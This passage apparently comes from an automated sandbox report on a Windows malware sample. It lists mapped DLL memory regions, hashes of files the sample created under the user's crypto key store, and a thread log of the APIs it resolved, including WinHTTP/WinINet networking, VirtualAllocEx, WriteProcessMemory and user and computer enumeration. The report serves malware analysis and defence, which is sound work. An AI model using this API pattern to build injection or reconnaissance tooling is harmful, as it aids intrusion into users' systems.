| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| winscard.dll | 0x6fff0000 | 0x7001cfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x70040000 | 0x7006efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x70070000 | 0x70082fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x72770000 | 0x72791fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 127 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\578c3c4f2234dc4bd77dc4898cd130e8_94f34c22-5cd3-4d50-aa5e-52adff408a05 | 1.43 KB |
MD5:
6a03a546bfb131724e287f21b81ac413
SHA1: a22a071ae0bfb566db0bdebb864f4f5dc5c22f04 SHA256: bfc99ece8e979c586d21891d6351f6340b16ec3a26a4e4d61c3e312974dadbf5 SSDeep: 24:ktD4sMUxtUIDUv3ryiBerzELKlM7XUutgB4TZRvITfrIbpnd3+su6+h49QwIlZKJ:ktD4sVxtUIY/ryicijUuQOR6TIbpksuS |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\578c3c4f2234dc4bd77dc4898cd130e8_94f34c22-5cd3-4d50-aa5e-52adff408a05 | 0.06 KB |
MD5:
bf50918b43f55702fab547696cc28996
SHA1: 299df4c707fe72602a3fbf06685efc1a2b1e320b SHA256: 047c651ad317f5883686847ce068b0760bc5334f311009d4e153ef14b940c5bf SSDeep: 3:/lTlaX+QRD1:Oft1 |
|
|
Threads
Thread 0x574
242
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\eappcfg.dll, base_address = 0x6ffa0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Handle | module_name = WININET.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Module | Get Handle | module_name = PSAPI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Module | Get Handle | module_name = USERENV.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ws2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Handle | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x70210000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Module | Get Handle | module_name = NETAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = NETAPI32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
